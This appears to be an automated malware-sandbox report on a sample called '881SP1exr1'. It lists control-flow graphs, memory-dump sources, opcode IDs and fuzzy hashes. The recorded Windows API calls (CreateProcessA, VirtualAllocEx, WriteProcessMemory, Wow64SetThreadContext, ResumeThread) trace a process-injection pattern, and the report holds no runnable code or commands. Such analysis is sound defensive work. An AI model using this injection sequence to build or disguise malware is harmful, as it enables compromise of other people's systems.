                                                                                                                control_flow_graph 800 78d87f4-78d8895 803 78d88ce-78d88ee 800->803 804 78d8897-78d88a1 800->804 809 78d8927-78d8956 803->809 810 78d88f0-78d88fa 803->810 804->803 805 78d88a3-78d88a5 804->805 807 78d88c8-78d88cb 805->807 808 78d88a7-78d88b1 805->808 807->803 811 78d88b5-78d88c4 808->811 812 78d88b3 808->812 820 78d898f-78d8a49 CreateProcessA 809->820 821 78d8958-78d8962 809->821 810->809 813 78d88fc-78d88fe 810->813 811->811 814 78d88c6 811->814 812->811 815 78d8921-78d8924 813->815 816 78d8900-78d890a 813->816 814->807 815->809 818 78d890c 816->818 819 78d890e-78d891d 816->819 818->819 819->819 822 78d891f 819->822 832 78d8a4b-78d8a51 820->832 833 78d8a52-78d8ad8 820->833 821->820 823 78d8964-78d8966 821->823 822->815 825 78d8989-78d898c 823->825 826 78d8968-78d8972 823->826 825->820 827 78d8974 826->827 828 78d8976-78d8985 826->828 827->828 828->828 829 78d8987 828->829 829->825 832->833 843 78d8ae8-78d8aec 833->843 844 78d8ada-78d8ade 833->844 845 78d8afc-78d8b00 843->845 846 78d8aee-78d8af2 843->846 844->843 847 78d8ae0 844->847 849 78d8b10-78d8b14 845->849 850 78d8b02-78d8b06 845->850 846->845 848 78d8af4 846->848 847->843 848->845 852 78d8b26-78d8b2d 849->852 853 78d8b16-78d8b1c 849->853 850->849 851 78d8b08 850->851 851->849 854 78d8b2f-78d8b3e 852->854 855 78d8b44 852->855 853->852 854->855 856 78d8b45 855->856 856->856
                                                                                                                APIs
                                                                                                                • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 078D8A36
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1648587532.00000000078D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078D0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_78d0000_881SP1exr1.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CreateProcess
                                                                                                                • String ID:
                                                                                                                • API String ID: 963392458-0
                                                                                                                • Opcode ID: a07e1c5877a9c0754011fdff8ad02297b333e5a5bd23cc5a1ae6323e2c3b1092
                                                                                                                • Instruction ID: 5536bbb7cab12b9106d9c33ebba957896b26fa20833cefdc19d4c30dbd551376
                                                                                                                • Opcode Fuzzy Hash: a07e1c5877a9c0754011fdff8ad02297b333e5a5bd23cc5a1ae6323e2c3b1092
                                                                                                                • Instruction Fuzzy Hash: 60A15BB1D0021ADFDB10DFA9C841BEEBBB2BF54314F1485A9E848E7250DB749985CF92
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 858 78d8800-78d8895 860 78d88ce-78d88ee 858->860 861 78d8897-78d88a1 858->861 866 78d8927-78d8956 860->866 867 78d88f0-78d88fa 860->867 861->860 862 78d88a3-78d88a5 861->862 864 78d88c8-78d88cb 862->864 865 78d88a7-78d88b1 862->865 864->860 868 78d88b5-78d88c4 865->868 869 78d88b3 865->869 877 78d898f-78d8a49 CreateProcessA 866->877 878 78d8958-78d8962 866->878 867->866 870 78d88fc-78d88fe 867->870 868->868 871 78d88c6 868->871 869->868 872 78d8921-78d8924 870->872 873 78d8900-78d890a 870->873 871->864 872->866 875 78d890c 873->875 876 78d890e-78d891d 873->876 875->876 876->876 879 78d891f 876->879 889 78d8a4b-78d8a51 877->889 890 78d8a52-78d8ad8 877->890 878->877 880 78d8964-78d8966 878->880 879->872 882 78d8989-78d898c 880->882 883 78d8968-78d8972 880->883 882->877 884 78d8974 883->884 885 78d8976-78d8985 883->885 884->885 885->885 886 78d8987 885->886 886->882 889->890 900 78d8ae8-78d8aec 890->900 901 78d8ada-78d8ade 890->901 902 78d8afc-78d8b00 900->902 903 78d8aee-78d8af2 900->903 901->900 904 78d8ae0 901->904 906 78d8b10-78d8b14 902->906 907 78d8b02-78d8b06 902->907 903->902 905 78d8af4 903->905 904->900 905->902 909 78d8b26-78d8b2d 906->909 910 78d8b16-78d8b1c 906->910 907->906 908 78d8b08 907->908 908->906 911 78d8b2f-78d8b3e 909->911 912 78d8b44 909->912 910->909 911->912 913 78d8b45 912->913 913->913
                                                                                                                APIs
                                                                                                                • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 078D8A36
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1648587532.00000000078D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078D0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_78d0000_881SP1exr1.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CreateProcess
                                                                                                                • String ID:
                                                                                                                • API String ID: 963392458-0
                                                                                                                • Opcode ID: 2de37563c271052f394394a805765d77fb05e6c1f51acf8c700643e1f0e981b0
                                                                                                                • Instruction ID: 51d3eb248472ebbf7a09f47d00ce914f534b12f484df1ff2d0a8626dcf94626b
                                                                                                                • Opcode Fuzzy Hash: 2de37563c271052f394394a805765d77fb05e6c1f51acf8c700643e1f0e981b0
                                                                                                                • Instruction Fuzzy Hash: 14914AB1D0021ADFDB14DFA9C841BEDBBB2BF48314F1485A9E848E7250DB749985CF92
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 915 15ead48-15ead57 916 15ead59-15ead66 call 15ea06c 915->916 917 15ead83-15ead87 915->917 923 15ead7c 916->923 924 15ead68 916->924 919 15ead9b-15eaddc 917->919 920 15ead89-15ead93 917->920 926 15eadde-15eade6 919->926 927 15eade9-15eadf7 919->927 920->919 923->917 972 15ead6e call 15eafd0 924->972 973 15ead6e call 15eafe0 924->973 926->927 928 15eae1b-15eae1d 927->928 929 15eadf9-15eadfe 927->929 934 15eae20-15eae27 928->934 931 15eae09 929->931 932 15eae00-15eae07 call 15ea078 929->932 930 15ead74-15ead76 930->923 933 15eaeb8-15eaf34 930->933 936 15eae0b-15eae19 931->936 932->936 965 15eaf36-15eaf5e 933->965 966 15eaf60-15eaf78 933->966 937 15eae29-15eae31 934->937 938 15eae34-15eae3b 934->938 936->934 937->938 941 15eae3d-15eae45 938->941 942 15eae48-15eae51 call 15ea088 938->942 941->942 946 15eae5e-15eae63 942->946 947 15eae53-15eae5b 942->947 948 15eae65-15eae6c 946->948 949 15eae81-15eae85 946->949 947->946 948->949 951 15eae6e-15eae7e call 15ea098 call 15ea0a8 948->951 954 15eae8b-15eae8e 949->954 951->949 956 15eae90-15eaeae 954->956 957 15eaeb1-15eaeb7 954->957 956->957 965->966 967 15eaf7a-15eaf7d 966->967 968 15eaf80-15eafab GetModuleHandleW 966->968 967->968 969 15eafad-15eafb3 968->969 970 15eafb4-15eafc8 968->970 969->970 972->930 973->930
                                                                                                                APIs
                                                                                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 015EAF9E
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1643619835.00000000015E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015E0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_15e0000_881SP1exr1.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: HandleModule
                                                                                                                • String ID:
                                                                                                                • API String ID: 4139908857-0
                                                                                                                • Opcode ID: 33fe3c695b3404e705d140bc799a02c6689fb664c7e1632e1e937c9ef67aa774
                                                                                                                • Instruction ID: 13e7839b9349ea38387d45d8dd0cbe4d9c95a87aa50db718547cc811a7a1bb46
                                                                                                                • Opcode Fuzzy Hash: 33fe3c695b3404e705d140bc799a02c6689fb664c7e1632e1e937c9ef67aa774
                                                                                                                • Instruction Fuzzy Hash: 0D812470A00B058FDB28DF39D54979ABBF1BF88304F10892ED49ADBA50D775E849CB90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 1082 15e44c4-15e59d9 CreateActCtxA 1085 15e59db-15e59e1 1082->1085 1086 15e59e2-15e5a3c 1082->1086 1085->1086 1093 15e5a3e-15e5a41 1086->1093 1094 15e5a4b-15e5a4f 1086->1094 1093->1094 1095 15e5a60 1094->1095 1096 15e5a51-15e5a5d 1094->1096 1098 15e5a61 1095->1098 1096->1095 1098->1098
                                                                                                                APIs
                                                                                                                • CreateActCtxA.KERNEL32(?), ref: 015E59C9
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1643619835.00000000015E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015E0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_15e0000_881SP1exr1.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Create
                                                                                                                • String ID:
                                                                                                                • API String ID: 2289755597-0
                                                                                                                • Opcode ID: 3147a78668dd57f1bc03a412b7dd3533a37298a9bf528a9a3e9773fe259d8134
                                                                                                                • Instruction ID: 2c21ed63816d913ab002af16a7d9c7a2a57350caafb3e0b1d288bdccf39bfce8
                                                                                                                • Opcode Fuzzy Hash: 3147a78668dd57f1bc03a412b7dd3533a37298a9bf528a9a3e9773fe259d8134
                                                                                                                • Instruction Fuzzy Hash: 7041D2B4C00719CBDB24DFA9C888BDDBBF5BF49304F24806AD408AB255EBB55985CF91
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 1099 15e590c-15e59d9 CreateActCtxA 1101 15e59db-15e59e1 1099->1101 1102 15e59e2-15e5a3c 1099->1102 1101->1102 1109 15e5a3e-15e5a41 1102->1109 1110 15e5a4b-15e5a4f 1102->1110 1109->1110 1111 15e5a60 1110->1111 1112 15e5a51-15e5a5d 1110->1112 1114 15e5a61 1111->1114 1112->1111 1114->1114
                                                                                                                APIs
                                                                                                                • CreateActCtxA.KERNEL32(?), ref: 015E59C9
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1643619835.00000000015E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015E0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_15e0000_881SP1exr1.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Create
                                                                                                                • String ID:
                                                                                                                • API String ID: 2289755597-0
                                                                                                                • Opcode ID: 2b11d1209a09cbf1b0ee611acf2516471af7b8d6538a676aa3f0a7c64c9a29f5
                                                                                                                • Instruction ID: 7163db06a7620b79129a0c7f9b4b021985b7d8de41863b2661a25f21e3481e51
                                                                                                                • Opcode Fuzzy Hash: 2b11d1209a09cbf1b0ee611acf2516471af7b8d6538a676aa3f0a7c64c9a29f5
                                                                                                                • Instruction Fuzzy Hash: 3B41D2B4C00719CBDB24CFA9C9847CDBBF5BF49308F24805AD408AB255EB755985CF90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 1115 78d9df8-78d9dfd 1116 78d9dff-78d9e2d 1115->1116 1117 78d9d9b-78d9dab 1115->1117 1118 78d9e2f 1116->1118 1119 78d9e34-78d9e47 1116->1119 1120 78d9dad-78d9db0 1117->1120 1121 78d9db5-78d9dd2 PostMessageW 1117->1121 1118->1119 1125 78d9e49-78d9e56 1119->1125 1126 78d9e58-78d9e73 1119->1126 1120->1121 1122 78d9ddb-78d9def 1121->1122 1123 78d9dd4-78d9dda 1121->1123 1123->1122 1125->1126 1130 78d9e7d 1126->1130 1131 78d9e75 1126->1131 1133 78d9e7e 1130->1133 1131->1130 1133->1133
                                                                                                                APIs
                                                                                                                • PostMessageW.USER32(?,?,?,?), ref: 078D9DC5
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1648587532.00000000078D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078D0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_78d0000_881SP1exr1.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessagePost
                                                                                                                • String ID:
                                                                                                                • API String ID: 410705778-0
                                                                                                                • Opcode ID: fb7fb24558159b001b1032c10123eb8b274e3b4be3e75b5aff1f0b90a13708e6
                                                                                                                • Instruction ID: 59eff1efccca8c55c52db7251d458f28e3fc3210e02bef697398b92854ce3fd8
                                                                                                                • Opcode Fuzzy Hash: fb7fb24558159b001b1032c10123eb8b274e3b4be3e75b5aff1f0b90a13708e6
                                                                                                                • Instruction Fuzzy Hash: 5F21ECB2A042198BDB10EFA4D8193EEBBF4EF58314F04445AD844F7241C7782D84CBA0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 078D8608
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1648587532.00000000078D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078D0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_78d0000_881SP1exr1.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MemoryProcessWrite
                                                                                                                • String ID:
                                                                                                                • API String ID: 3559483778-0
                                                                                                                • Opcode ID: 803f452ff7d16f58bd89c12bb3615a9cec4d6b860123a1d735109e35379e3289
                                                                                                                • Instruction ID: 893a5b5fa8baef8d49a18905228c30861807779478e59823b62c37bcda4b1fe6
                                                                                                                • Opcode Fuzzy Hash: 803f452ff7d16f58bd89c12bb3615a9cec4d6b860123a1d735109e35379e3289
                                                                                                                • Instruction Fuzzy Hash: 552148B19003199FCB10CFA9C885BDEBBF5FF48320F108429E918A7240C7789944CBA4
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 078D86E8
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1648587532.00000000078D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078D0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_78d0000_881SP1exr1.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MemoryProcessRead
                                                                                                                • String ID:
                                                                                                                • API String ID: 1726664587-0
                                                                                                                • Opcode ID: e717cb08df2ad7dfa3ed9ca6f1604eef28ff3e89672fd46e6914792e59b4cbb1
                                                                                                                • Instruction ID: 9497d6a25c2dfbb6a7e1176e03d6d0a247d7724cf1f831074cc46a9a96ffb5a4
                                                                                                                • Opcode Fuzzy Hash: e717cb08df2ad7dfa3ed9ca6f1604eef28ff3e89672fd46e6914792e59b4cbb1
                                                                                                                • Instruction Fuzzy Hash: DC2128B18002599FCB10DFA9C984AEEFBF5FF48320F10882AE558A7250C7789954CBA4
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 078D81FE
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1648587532.00000000078D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078D0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_78d0000_881SP1exr1.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ContextThreadWow64
                                                                                                                • String ID:
                                                                                                                • API String ID: 983334009-0
                                                                                                                • Opcode ID: d7140288a38cfdf15875fa261321cf8d40be66c26fbb33abeec68e45429719f5
                                                                                                                • Instruction ID: 0398de847561ed286300205142a9996df393a1e8124711921ee4e7a72759b32d
                                                                                                                • Opcode Fuzzy Hash: d7140288a38cfdf15875fa261321cf8d40be66c26fbb33abeec68e45429719f5
                                                                                                                • Instruction Fuzzy Hash: 5E2149B19003098FDB10DFAAC584BEEBBF5EF48324F14842AD459A7250DB789985CFA4
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 015ED6B7
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1643619835.00000000015E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015E0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_15e0000_881SP1exr1.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: DuplicateHandle
                                                                                                                • String ID:
                                                                                                                • API String ID: 3793708945-0
                                                                                                                • Opcode ID: 7c22153629d987d815f287fbcd1967206ab22099897de6ab6e065231b9ac7c7d
                                                                                                                • Instruction ID: 17a4cc3bcf24ed95bdb203aac94ea7e2d30ccfa1dbcc23b371535ef2e7846f03
                                                                                                                • Opcode Fuzzy Hash: 7c22153629d987d815f287fbcd1967206ab22099897de6ab6e065231b9ac7c7d
                                                                                                                • Instruction Fuzzy Hash: 8721E0B5D002199FDB10CFAAD984ADEBBF5FB48324F14841AE918A7350C378A944CFA4
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 078D86E8
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1648587532.00000000078D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078D0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_78d0000_881SP1exr1.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MemoryProcessRead
                                                                                                                • String ID:
                                                                                                                • API String ID: 1726664587-0
                                                                                                                • Opcode ID: f1fcf8b8e56ffd27a0e987a3c69207b5b89943d191be49c0736cb8528318f004
                                                                                                                • Instruction ID: 5fafe3af3ae494c83aabde68496620911170ced05222e7968cd9b62dc09e10f0
                                                                                                                • Opcode Fuzzy Hash: f1fcf8b8e56ffd27a0e987a3c69207b5b89943d191be49c0736cb8528318f004
                                                                                                                • Instruction Fuzzy Hash: AC2139B18003599FCB10DFAAC844ADEFBF5FF48320F108429E558A7250C7749944CBA4
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 078D81FE
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1648587532.00000000078D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078D0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_78d0000_881SP1exr1.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ContextThreadWow64
                                                                                                                • String ID:
                                                                                                                • API String ID: 983334009-0
                                                                                                                • Opcode ID: 1b6d8131ff06e97043145f1dad9e8e6f7f334eafd90f5714825c3ebed3492998
                                                                                                                • Instruction ID: 9e1f89fa6e45baa53c0afd0bc2ec85ad2ea94f0d83baaea7bb80bd241aaf2b55
                                                                                                                • Opcode Fuzzy Hash: 1b6d8131ff06e97043145f1dad9e8e6f7f334eafd90f5714825c3ebed3492998
                                                                                                                • Instruction Fuzzy Hash: 5E2149B19003098FDB10DFAAC485BEEBBF4EF48324F108429D459A7240D7789984CFA4
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 015ED6B7
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1643619835.00000000015E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015E0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_15e0000_881SP1exr1.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: DuplicateHandle
                                                                                                                • String ID:
                                                                                                                • API String ID: 3793708945-0
                                                                                                                • Opcode ID: 13d255fa8e98542d28c7e17fe06a035b857f2cecadfdc4e1a9cb97cfcedce9a2
                                                                                                                • Instruction ID: 730738138bf65ecdbf952a11e651a9b0306004eb469277e2fcc6aa047bc22e24
                                                                                                                • Opcode Fuzzy Hash: 13d255fa8e98542d28c7e17fe06a035b857f2cecadfdc4e1a9cb97cfcedce9a2
                                                                                                                • Instruction Fuzzy Hash: 9A21E2B5D002089FDB10CFAAD984ADEBFF9FB48320F14841AE918A7350C374A944CFA4
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 078D82C6
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1648587532.00000000078D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078D0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_78d0000_881SP1exr1.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AllocVirtual
                                                                                                                • String ID:
                                                                                                                • API String ID: 4275171209-0
                                                                                                                • Opcode ID: 43507999e9d6fdc0b3ef097de1d50eac75965cb1bd8611e9490f7b07dec74dfc
                                                                                                                • Instruction ID: e7e4f9e4b6d75a744616bc87506460040e92904ad8333408a29dea4e978d7857
                                                                                                                • Opcode Fuzzy Hash: 43507999e9d6fdc0b3ef097de1d50eac75965cb1bd8611e9490f7b07dec74dfc
                                                                                                                • Instruction Fuzzy Hash: 6D1167B29002499FCB10DFAAC844BDEFFF5EF88324F14881AE559A7250C7759994CFA4
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,015EB019,00000800,00000000,00000000), ref: 015EB22A
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1643619835.00000000015E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015E0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_15e0000_881SP1exr1.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: LibraryLoad
                                                                                                                • String ID:
                                                                                                                • API String ID: 1029625771-0
                                                                                                                • Opcode ID: 7208d40d3f9854af616db3dd4b30ccd935d9420a51ae0750d21853f82321a73b
                                                                                                                • Instruction ID: 8a5196487881ce02d0dd71940258948f5bd0f1ed26703b87a0427bc463e5a3a6
                                                                                                                • Opcode Fuzzy Hash: 7208d40d3f9854af616db3dd4b30ccd935d9420a51ae0750d21853f82321a73b
                                                                                                                • Instruction Fuzzy Hash: FB11E4B6D002099FDB14DF9AD448ADEFBF5FF48310F10842AE519AB250C375A945CFA5
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,015EB019,00000800,00000000,00000000), ref: 015EB22A
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1643619835.00000000015E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015E0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_15e0000_881SP1exr1.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: LibraryLoad
                                                                                                                • String ID:
                                                                                                                • API String ID: 1029625771-0
                                                                                                                • Opcode ID: e0cb5c80a383f46e659ce5e0e6cdbd994fc3896494fa21bf06412dddd2f99892
                                                                                                                • Instruction ID: 011a8cbfed9474fa7d49d70f6d0f6e30fef6689c7f8ef1a12662715d45755a7b
                                                                                                                • Opcode Fuzzy Hash: e0cb5c80a383f46e659ce5e0e6cdbd994fc3896494fa21bf06412dddd2f99892
                                                                                                                • Instruction Fuzzy Hash: 321100B6D002498FDB14DFAAD448ADEFBF4FB48310F14842AD559AB210C3B5A545CFA5
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 078D82C6
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1648587532.00000000078D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078D0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_78d0000_881SP1exr1.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AllocVirtual
                                                                                                                • String ID:
                                                                                                                • API String ID: 4275171209-0
                                                                                                                • Opcode ID: ea2f73db6b43e54c4e564d72c7ec5b76315d4438d13a96042b0ebed61c6bbb7e
                                                                                                                • Instruction ID: ba730e7ab7e80ffe58fee2aaa9c568b4e9452d0556e618b45d9a594549c78eb5
                                                                                                                • Opcode Fuzzy Hash: ea2f73db6b43e54c4e564d72c7ec5b76315d4438d13a96042b0ebed61c6bbb7e
                                                                                                                • Instruction Fuzzy Hash: B01137B19002499FCB10DFAAC844BDFBFF5EF88324F108819E559A7250C775A954CFA4
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1648587532.00000000078D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078D0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_78d0000_881SP1exr1.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ResumeThread
                                                                                                                • String ID:
                                                                                                                • API String ID: 947044025-0
                                                                                                                • Opcode ID: 8b2dedcfd5ee604d3f8356ea3a6cee088fe317c2689ae284a491cb6c8468ca8e
                                                                                                                • Instruction ID: 2e20c694e0b8fe13ac68301b625fa5f273ddc1d2b2380b2b9f3543923bf558e8
                                                                                                                • Opcode Fuzzy Hash: 8b2dedcfd5ee604d3f8356ea3a6cee088fe317c2689ae284a491cb6c8468ca8e
                                                                                                                • Instruction Fuzzy Hash: A7113AB19002598FCB10DFAAC4457DEFBF5EB88324F208819D559A7250C775A944CF94
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 015EAF9E
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1643619835.00000000015E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015E0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_15e0000_881SP1exr1.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: HandleModule
                                                                                                                • String ID:
                                                                                                                • API String ID: 4139908857-0
                                                                                                                • Opcode ID: d02f565ecb4badedbd0c928e16aa1f28dc3222f993cb0f0b85a6ef7755c8f92f
                                                                                                                • Instruction ID: 9cb075d91386f0a382f27bfe1f115617ddc07e60808f4695bc2130cbc93488a7
                                                                                                                • Opcode Fuzzy Hash: d02f565ecb4badedbd0c928e16aa1f28dc3222f993cb0f0b85a6ef7755c8f92f
                                                                                                                • Instruction Fuzzy Hash: 891113B5C002498FDB14CF9AC448ADEFBF4AB88314F10841AD428A7250C375A545CFA5
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • PostMessageW.USER32(?,?,?,?), ref: 078D9DC5
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1648587532.00000000078D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078D0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_78d0000_881SP1exr1.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessagePost
                                                                                                                • String ID:
                                                                                                                • API String ID: 410705778-0
                                                                                                                • Opcode ID: 19030491d775072b8682a60f4554679017c6d10ac69d7d7ad67ed1788d127e37
                                                                                                                • Instruction ID: 8dda7eab5944f30e1d6555f463181a03a56a5e198feb5c964dbcebb1a81ca091
                                                                                                                • Opcode Fuzzy Hash: 19030491d775072b8682a60f4554679017c6d10ac69d7d7ad67ed1788d127e37
                                                                                                                • Instruction Fuzzy Hash: 9C11D3B58003499FDB10DF9AC449BDEBBF8EB48324F108819D558A7650C375A984CFA5
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1643258673.000000000133D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0133D000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_133d000_881SP1exr1.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 9ccb21fd9ac1646860b7bba8913cd63a69c92c95585d7e6c6627c0e1555ac13e
                                                                                                                • Instruction ID: e5ebc938054b242f874e208fd25ca0f1ccfbdd0bc2304796764076abdee79bce
                                                                                                                • Opcode Fuzzy Hash: 9ccb21fd9ac1646860b7bba8913cd63a69c92c95585d7e6c6627c0e1555ac13e
